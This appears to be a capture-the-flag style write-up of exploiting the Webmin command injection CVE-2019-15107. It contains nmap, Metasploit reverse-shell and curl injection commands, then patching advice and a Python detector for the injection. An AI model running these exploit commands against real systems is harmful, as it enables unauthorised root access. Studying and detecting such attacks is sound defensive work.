CVE-2019-15107 PoC — Webmin OS Command Injection Vulnerability

Associated Vulnerability
Title: Webmin OS Command Injection Vulnerability (CVE-2019-15107)
Description:An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.
Readme
Research Objective:
To conduct a comprehensive analysis and successful exploitation of a Remote Code Execution (RCE) vulnerability in Webmin version 1.890 (CVE-2019-15107), ultimately gaining full control over the target system.

Methodology:

Initial Reconnaissance:

Network scanning performed using Nmap:

```bash
nmap -sV -sC -A -p- 10.201.105.185
```

Identified Webmin 1.890 service running on port 10000

Vulnerability Analysis:

Investigated the vulnerability mechanism in password_change.cgi

Confirmed the possibility of unauthenticated arbitrary command execution

Exploitation:

Implemented two attack vectors:

Using Metasploit Framework:

```bash
use exploit/linux/http/webmin_backdoor
set RHOSTS 10.201.105.185
set LHOST tun0
exploit
```

Manual exploitation via curl:

```bash
curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"
```

Post-Exploitation:

Obtained interactive root shell

Conducted filesystem analysis

Discovered flag files:

```bash
/home/dark/user.txt
/root/root.txt
```

Findings:

Successfully exploited CVE-2019-15107 vulnerability

Gained complete root privileges on the system

Demonstrated critical importance of timely software updates

Technical Conclusions:

Vulnerability allows arbitrary command execution via "old" parameter injection

Lack of authentication checks makes this particularly dangerous

Version 1.890 contains a backdoor patched in later releases
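
One way to flag requests shaped like the curl command above in captured HTTP traffic, as an added example that is not part of the original README. It assumes request bodies are available to the defender (for example from a reverse proxy in front of Webmin); the function names, the watched-parameter list and the sample records are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Characters a shell would interpret: pipe, semicolon, ampersand, backtick,
# newline, and the start of a $( ) command substitution.
SHELL_META = re.compile(r"[|;&`\r\n]|\$\(")

# "old" is the injection point named in the README; watching "expired" as
# well is an assumption of this example (it travels in the same request).
WATCHED_PARAMS = ("old", "expired")


def suspicious_params(path, body):
    """Return {param: decoded value} for watched fields with shell metacharacters."""
    if path.split("?", 1)[0] != "/password_change.cgi":
        return {}
    hits = {}
    # parse_qsl percent-decodes, so "%7C" and a literal "|" are treated alike.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in WATCHED_PARAMS and SHELL_META.search(value):
            hits[name] = value
    return hits


def scan(records):
    """records: iterable of (source_ip, path, body). Returns flagged (source_ip, hits)."""
    flagged = []
    for src, path, body in records:
        hits = suspicious_params(path, body)
        if hits:
            flagged.append((src, hits))
    return flagged


# Constructed sample records (documentation IP ranges); the first body is the
# one from the README's curl command, the second is its percent-encoded form.
SAMPLES = [
    ("198.51.100.7", "/password_change.cgi", "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"),
    ("198.51.100.7", "/password_change.cgi", "user=root&pam=&expired=2&old=test%7Cid&new1=test&new2=test"),
    ("192.0.2.10", "/password_change.cgi", "user=alice&pam=&expired=2&old=Winter2019&new1=x&new2=x"),
    ("192.0.2.10", "/session_login.cgi", "user=alice&pass=a|b"),
]

if __name__ == "__main__":
    for src, hits in scan(SAMPLES):
        print(f"ALERT {src} password_change.cgi {hits}")
```

A legitimate old password can contain these characters, so treat a hit as a triage signal and correlate it with the source address and the Webmin version in use.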

Security Recommendations:

Immediate upgrade to current Webmin version

Restrict management panel access by IP

Regular security audits of web applications

Further Research Directions:

Analysis of other Webmin vulnerabilities

Development of custom exploit without Metasploit

Investigation of persistence techniques in compromised systems

This case study demonstrates the critical importance of timely system updates and the necessity for continuous vulnerability monitoring in deployed software. The research provides practical insights into modern web application exploitation techniques while emphasizing fundamental security principles.